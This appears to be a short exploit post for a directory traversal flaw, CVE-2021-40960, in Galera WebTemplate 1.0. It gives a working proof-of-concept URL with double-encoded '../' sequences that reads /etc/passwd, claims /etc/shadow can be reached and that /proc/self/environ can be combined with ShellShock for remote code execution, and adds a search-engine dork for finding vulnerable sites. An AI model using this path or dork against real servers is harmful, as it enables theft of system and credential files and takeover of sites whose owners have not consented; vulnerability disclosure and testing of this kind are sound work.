Galera WebTemplate 1.0 – Directory Traversal Vulnerability/CVE-2021-40960

Exploit Title:Galera Templeta 1.0 Web Templeta Directory Traversal Vulnerability

Exploit Author:Ömer Yılmaz

CVE-ID:CVE-2021-40960


There are multiple Vulnerable urls that allow us to switch between directories. Some of these url addresses are vulnerable to ShellShock vulnerability.

The vulnerability in the directory "/GallerySite/filesrc/fotoilan/388/middle/" allows sensitive files such as "/etc/passwd" and "/etc/shadow" to be run.

The vulnerability allows us to run code remotely by accessing the "/proc/self/environ" directory on some servers and creating a ShellShock vulnerability.


PoC
/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd


Dorks:

inurl:/GallerySite/


Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir